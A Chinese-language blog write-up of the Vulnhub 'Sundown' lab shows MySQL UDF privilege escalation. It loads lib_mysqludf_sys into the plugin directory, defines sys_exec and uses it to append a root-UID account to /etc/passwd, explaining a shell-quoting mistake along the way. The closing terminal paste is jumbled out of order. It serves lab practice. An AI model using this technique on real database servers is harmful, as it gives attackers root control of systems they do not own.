利用Mysql提權的步驟以及一種低階錯誤的說明
阿新 • • 發佈:2022-12-12
利用Mysql提權的步驟以及一種低階錯誤的說明
通過一些方式獲取了目標主機mysql的使用者名稱和密碼,這時我們想通過mysql來執行系統命令,此時我們可以考慮使用UDF進行提權。需要提前將lib_mysqludf_sys_64.so檔案(Kali linux上有該檔案)上傳至靶機/tmp目錄下。然後連線資料庫。另外需要提前生成具有root許可權的使用者的密碼:
┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ sudo openssl passwd -1 -salt bob 123456
$1$bob$7Llv2KscjOtcMna9mt7Ps0
目標就是將bob(具有root許可權)追加到/etc/passwd檔案中去,即:
bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash
然後在資料庫中進行如下步驟:
第一步:use mysql;
第二步:建立新表: create table potato(line blob);
第三步:插入外掛:insert into potato values(load_file(‘/tmp/lib_mysqludf_sys_64.so’));
SHOW VARIABLES LIKE ‘%plugin%’;
select * from potato into dumpfile
‘/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so’;
create function sys_exec returns integer soname ‘lib_mysqludf_sys_64.so’;
接下來,在進入插入使用者名稱密碼過程中犯了一個低階錯誤,即
select sys_exec('echo "bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd');
雙引號在裡面導致美元符號會被解釋,從而密碼驗證的時候會不對,導致驗證失敗。
如下所示:
MariaDB [mysql]> select sys_exec('echo "jason:12345:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd'); +----------------------------------------------------------------------------------+ | sys_exec('echo "jason:12345:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd') | +----------------------------------------------------------------------------------+ | 0 | +----------------------------------------------------------------------------------+ 1 row in set (0.001 sec) MariaDB [mysql]> quit Bye carlos@sundown:/tmp$ su - jason Password: su: Authentication failure
其實只需將sys_exec命令的單引號與雙引號互換即可正確執行,完整過程如下:
carlos@sundown:/tmp$ mysql -uroot -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 161571
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> SHOW VARIABLES LIKE '%plugin%';
+-----------------+---------------------------------------------+
| Variable_name | Value |
+-----------------+---------------------------------------------+
| plugin_dir | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma |
+-----------------+---------------------------------------------+
2 rows in set (0.001 sec)
MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [mysql]> create table potato(line blob);
Query OK, 0 rows affected (0.009 sec)
MariaDB [mysql]> insert into potato values(load_file('/tmp/lib_mysqludf_sys_64.so'));
Query OK, 1 row affected (0.003 sec)
MariaDB [mysql]> SHOW VARIABLES LIKE ‘%plugin%’;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '‘%plugin%’' at line 1
MariaDB [mysql]> SHOW VARIABLES LIKE '%plugin%';
+-----------------+---------------------------------------------+
| Variable_name | Value |
+-----------------+---------------------------------------------+
| plugin_dir | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma |
+-----------------+---------------------------------------------+
2 rows in set (0.001 sec)
MariaDB [mysql]> select * from potato into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so';
Query OK, 1 row affected (0.000 sec)
MariaDB [mysql]> create function sys_exec returns integer soname 'lib_mysqludf_sys_64MariaDB [mysql]> select sys_exec("echo 'bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash' >> /etc/passwd");
+--------------------------------------------------------------------------------------------------------+
| sys_exec("echo 'bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash' >> /etc/passwd") |
+--------------------------------------------------------------------------------------------------------+
| 0 |
+--------------------------------------------------------------------------------------------------------+
1 row in set (0.001 sec)
MariaDB [mysql]>carlos@sundown:/tmp$ su - bob
Password:
root@sundown:~# id
uid=0(root) gid=0(root) groups=0(root)
root@sundown:~# ls -alh
total 28K
drwx------ 3 root root 4.0K Aug 3 2020 .
drwxr-xr-x 18 root root 4.0K Aug 3 2020 ..
lrwxrwxrwx 1 root root 9 Aug 3 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Aug 3 2020 .local
lrwxrwxrwx 1 root root 9 Aug 3 2020 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 1.3K Aug 3 2020 proof.txt
-rw-r--r-- 1 root root 66 Aug 3 2020 .selected_editor
root@sundown:~# cat proof.txt
_____,,,\//,,\\,/,
/-- --- --- -----
///--- --- -- - ----
o////- ---- --- --
!!//o/--- -- --
o*) !///,~,,\\,\/,,/,//,,
o!*!o'(\ /\
| ! o ",) \/\ /\ / \/\
o !o! !!| \/ \/ /
( * ( o!'; |\ \ /
o o ! * !` | \ / \
o | o 'o| | : \ /
* o !*!': |o| / /
(o''| `| : / /
! *|'` \|/ \\
' !o!':\ \\ \
( ('| \ `._______/
////\\\,,\///,,,,\,/oO._* o !*!'` `.________/
---- -- ------- - -oO*OoOo (o''| /
-------- ------ 'oO*OoO!*|'o!! \
------- -- - ---- --* oO*OoO *!'| ' /
--- - ----- ---- - oO*OoO!!':o!' /
- - ----- - -- - *--oO*OoOo!` /
\\\\\,,,\\,//////,\,,\\\/,,,\,,ejm/AMC
510252fabb4b7e7dddd7373b7b3da3e8
Thanks for playing - Felipe Winsnes (@whitecr0wz)
root@sundown:~#
quit
.so';
Query OK, 0 rows affected (0.000 sec)